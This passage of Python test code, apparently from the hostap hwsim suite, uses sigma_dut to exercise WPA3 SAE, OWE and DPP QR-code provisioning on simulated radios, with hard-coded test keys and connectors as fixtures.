dev[2].request("SET sae_groups ") dev[2].connect("test-sae", key_mgmt="SAE", psk="12345678", scan_freq="2412", ieee80211w="0", wait_connect=False) dev[0].request("SET sae_groups ") dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678", scan_freq="2412", ieee80211w="2") dev[1].connect("test-sae", psk="12345678", scan_freq="2412") ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1) dev[2].request("DISCONNECT") if ev is not None: raise Exception("Unexpected connection without PMF") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_owe(dev, apdev): """sigma_dut controlled OWE station""" try: run_sigma_dut_owe(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_owe(dev, apdev): if "OWE" not in dev[0].get_capability("key_mgmt"): raise HwsimSkip("OWE not supported") ifname = dev[0].ifname sigma = start_sigma_dut(ifname) try: params = {"ssid": "owe", "wpa": "2", "wpa_key_mgmt": "OWE", "ieee80211w": "2", "rsn_pairwise": "CCMP"} hapd = hostapd.add_ap(apdev[0], params) bssid = hapd.own_addr() sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE" % ifname) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) dev[0].dump_monitor() sigma_dut_cmd("sta_reassoc,interface,%s,Channel,1,bssid,%s" % (ifname, bssid)) dev[0].wait_connected() sigma_dut_cmd_check("sta_disconnect,interface," + ifname) dev[0].wait_disconnected() dev[0].dump_monitor() sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,20" % ifname) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) dev[0].wait_disconnected() dev[0].dump_monitor() sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,0" % ifname) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname) ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"], timeout=10) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) if ev is None: raise Exception("Association not rejected") if "status_code=77" not in ev: raise Exception("Unexpected rejection reason: " + ev) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_owe(dev, apdev, params): """sigma_dut controlled AP with OWE""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_owe.sigma-hostapd") if "OWE" not in dev[0].get_capability("key_mgmt"): raise HwsimSkip("OWE not supported") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_owe_ecgroupid(dev, apdev): """sigma_dut controlled AP with OWE and ECGroupID""" if "OWE" not in dev[0].get_capability("key_mgmt"): raise HwsimSkip("OWE not supported") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface) try: sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE,ECGroupID,20 21,PMF,Required") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2", owe_group="20", scan_freq="2412") dev[0].request("REMOVE_NETWORK all") dev[0].wait_disconnected() dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2", owe_group="21", scan_freq="2412") dev[0].request("REMOVE_NETWORK all") dev[0].wait_disconnected() dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2", owe_group="19", scan_freq="2412", wait_connect=False) ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"], timeout=10) dev[0].request("DISCONNECT") if ev is None: raise Exception("Association not rejected") if "status_code=77" not in ev: raise Exception("Unexpected rejection reason: " + ev) dev[0].dump_monitor() sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_owe_transition_mode(dev, apdev, params): """sigma_dut controlled AP with OWE and transition mode""" if "OWE" not in dev[0].get_capability("key_mgmt"): raise HwsimSkip("OWE not supported") logdir = os.path.join(params['logdir'], "sigma_dut_ap_owe_transition_mode.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,owe,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,OWE") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,SSID,owe,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,NONE") sigma_dut_cmd_check("ap_config_commit,NAME,AP") res1 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,1,Interface,24G") res2 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,2,Interface,24G") dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2", scan_freq="2412") dev[1].connect("owe", key_mgmt="NONE", scan_freq="2412") if dev[0].get_status_field('bssid') not in res1: raise Exception("Unexpected ap_get_mac_address WLAN_TAG,1: " + res1) if dev[1].get_status_field('bssid') not in res2: raise Exception("Unexpected ap_get_mac_address WLAN_TAG,2: " + res2) sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_owe_transition_mode_2(dev, apdev, params): """sigma_dut controlled AP with OWE and transition mode (2)""" if "OWE" not in dev[0].get_capability("key_mgmt"): raise HwsimSkip("OWE not supported") logdir = os.path.join(params['logdir'], "sigma_dut_ap_owe_transition_mode_2.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,owe,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,NONE") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,OWE") sigma_dut_cmd_check("ap_config_commit,NAME,AP") res1 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,1,Interface,24G") res2 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,2,Interface,24G") dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2", scan_freq="2412") dev[1].connect("owe", key_mgmt="NONE", scan_freq="2412") if dev[0].get_status_field('bssid') not in res2: raise Exception("Unexpected ap_get_mac_address WLAN_TAG,2: " + res1) if dev[1].get_status_field('bssid') not in res1: raise Exception("Unexpected ap_get_mac_address WLAN_TAG,1: " + res2) sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def dpp_init_enrollee(dev, id1): logger.info("Starting DPP initiator/enrollee in a thread") time.sleep(1) cmd = "DPP_AUTH_INIT peer=%d role=enrollee" % id1 if "OK" not in dev.request(cmd): raise Exception("Failed to initiate DPP Authentication") ev = dev.wait_event(["DPP-CONF-RECEIVED"], timeout=5) if ev is None: raise Exception("DPP configuration not completed (Enrollee)") logger.info("DPP initiator/enrollee done") def test_sigma_dut_dpp_qr_resp_1(dev, apdev): """sigma_dut DPP/QR responder (conf index 1)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 1) def test_sigma_dut_dpp_qr_resp_2(dev, apdev): """sigma_dut DPP/QR responder (conf index 2)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 2) def test_sigma_dut_dpp_qr_resp_3(dev, apdev): """sigma_dut DPP/QR responder (conf index 3)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 3) def test_sigma_dut_dpp_qr_resp_4(dev, apdev): """sigma_dut DPP/QR responder (conf index 4)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 4) def test_sigma_dut_dpp_qr_resp_5(dev, apdev): """sigma_dut DPP/QR responder (conf index 5)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 5) def test_sigma_dut_dpp_qr_resp_6(dev, apdev): """sigma_dut DPP/QR responder (conf index 6)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 6) def test_sigma_dut_dpp_qr_resp_7(dev, apdev): """sigma_dut DPP/QR responder (conf index 7)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 7) def test_sigma_dut_dpp_qr_resp_chan_list(dev, apdev): """sigma_dut DPP/QR responder (channel list override)""" run_sigma_dut_dpp_qr_resp(dev, apdev, 1, chan_list='81/2 81/6 81/1', listen_chan=2) def run_sigma_dut_dpp_qr_resp(dev, apdev, conf_idx, chan_list=None, listen_chan=None): check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) sigma = start_sigma_dut(dev[0].ifname) try: cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR" if chan_list: cmd += ",DPPChannelList," + chan_list res = sigma_dut_cmd(cmd) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) t = threading.Thread(target=dpp_init_enrollee, args=(dev[1], id1)) t.start() cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPConfIndex,%d,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPBS,QR,DPPTimeout,6" % conf_idx if listen_chan: cmd += ",DPPListenChannel," + str(listen_chan) res = sigma_dut_cmd(cmd, timeout=10) t.join() if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) def test_sigma_dut_dpp_qr_init_enrollee(dev, apdev): """sigma_dut DPP/QR initiator as Enrollee""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg" ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b" params = {"ssid": "DPPNET01", "wpa": "2", "ieee80211w": "2", "wpa_key_mgmt": "DPP", "rsn_pairwise": "CCMP", "dpp_connector": ap_connector, "dpp_csign": csign_pub, "dpp_netaccesskey": ap_netaccesskey} try: hapd = hostapd.add_ap(apdev[0], params) except: raise HwsimSkip("DPP not supported") sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") cmd = "DPP_CONFIGURATOR_ADD key=" + csign res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) dev[1].set("dpp_configurator_params", " conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id)) cmd = "DPP_LISTEN 2437 role=configurator" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def test_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev): """sigma_dut DPP/QR (mutual) initiator as Enrollee""" run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev) def test_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev): """sigma_dut DPP/QR (mutual) initiator as Enrollee (extra check)""" run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev, extra="DPPAuthDirection,Mutual,") def run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev, extra=''): check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg" ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b" params = {"ssid": "DPPNET01", "wpa": "2", "ieee80211w": "2", "wpa_key_mgmt": "DPP", "rsn_pairwise": "CCMP", "dpp_connector": ap_connector, "dpp_csign": csign_pub, "dpp_netaccesskey": ap_netaccesskey} try: hapd = hostapd.add_ap(apdev[0], params) except: raise HwsimSkip("DPP not supported") sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") cmd = "DPP_CONFIGURATOR_ADD key=" + csign res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) dev[1].set("dpp_configurator_params", " conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id)) cmd = "DPP_LISTEN 2437 role=configurator qr=mutual" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,%sDPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes" % extra, timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def dpp_init_conf_mutual(dev, id1, conf_id, own_id=None): time.sleep(1) logger.info("Starting DPP initiator/configurator in a thread") cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp ssid=%s configurator=%d" % (id1, to_hex("DPPNET01"), conf_id) if own_id is not None: cmd += " own=%d" % own_id if "OK" not in dev.request(cmd): raise Exception("Failed to initiate DPP Authentication") ev = dev.wait_event(["DPP-CONF-SENT"], timeout=10) if ev is None: raise Exception("DPP configuration not completed (Configurator)") logger.info("DPP initiator/configurator done") def test_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev): """sigma_dut DPP/QR (mutual) responder as Enrollee""" run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev) def test_sigma_dut_dpp_qr_mutual_resp_enrollee_pending(dev, apdev): """sigma_dut DPP/QR (mutual) responder as Enrollee (response pending)""" run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev, ',DPPDelayQRResponse,1') def run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev, extra=None): check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg" ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b" params = {"ssid": "DPPNET01", "wpa": "2", "ieee80211w": "2", "wpa_key_mgmt": "DPP", "rsn_pairwise": "CCMP", "dpp_connector": ap_connector, "dpp_csign": csign_pub, "dpp_netaccesskey": ap_netaccesskey} try: hapd = hostapd.add_ap(apdev[0], params) except: raise HwsimSkip("DPP not supported") sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") cmd = "DPP_CONFIGURATOR_ADD key=" + csign res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) id1 = dev[1].dpp_qr_code(uri) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) t = threading.Thread(target=dpp_init_conf_mutual, args=(dev[1], id1, conf_id, id0)) t.start() cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,20,DPPWaitForConnect,Yes" if extra: cmd += extra res = sigma_dut_cmd(cmd, timeout=25) t.join() if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def dpp_resp_conf_mutual(dev, conf_id, uri): logger.info("Starting DPP responder/configurator in a thread") dev.set("dpp_configurator_params", " conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id)) cmd = "DPP_LISTEN 2437 role=configurator qr=mutual" if "OK" not in dev.request(cmd): raise Exception("Failed to initiate DPP listen") if uri: ev = dev.wait_event(["DPP-SCAN-PEER-QR-CODE"], timeout=10) if ev is None: raise Exception("QR Code scan for mutual authentication not requested") dev.dpp_qr_code(uri) ev = dev.wait_event(["DPP-CONF-SENT"], timeout=10) if ev is None: raise Exception("DPP configuration not completed (Configurator)") logger.info("DPP responder/configurator done") def test_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev): """sigma_dut DPP/QR (mutual) initiator as Enrollee""" run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, False) def test_sigma_dut_dpp_qr_mutual_init_enrollee_pending(dev, apdev): """sigma_dut DPP/QR (mutual) initiator as Enrollee (response pending)""" run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, True) def run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, resp_pending): check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg" ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b" params = {"ssid": "DPPNET01", "wpa": "2", "ieee80211w": "2", "wpa_key_mgmt": "DPP", "rsn_pairwise": "CCMP", "dpp_connector": ap_connector, "dpp_csign": csign_pub, "dpp_netaccesskey": ap_netaccesskey} try: hapd = hostapd.add_ap(apdev[0], params) except: raise HwsimSkip("DPP not supported") sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") cmd = "DPP_CONFIGURATOR_ADD key=" + csign res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR") if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) hex = res.split(',')[3] uri = from_hex(hex) logger.info("URI from sigma_dut: " + uri) if not resp_pending: dev[1].dpp_qr_code(uri) uri = None res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) t = threading.Thread(target=dpp_resp_conf_mutual, args=(dev[1], conf_id, uri)) t.start() time.sleep(1) cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,10,DPPWaitForConnect,Yes" res = sigma_dut_cmd(cmd, timeout=15) t.join() if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def test_sigma_dut_dpp_qr_init_enrollee_psk(dev, apdev): """sigma_dut DPP/QR initiator as Enrollee (PSK)""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) params = hostapd.wpa2_params(ssid="DPPNET01", passphrase="ThisIsDppPassphrase") hapd = hostapd.add_ap(apdev[0], params) sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") cmd = "DPP_CONFIGURATOR_ADD" res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) dev[1].set("dpp_configurator_params", " 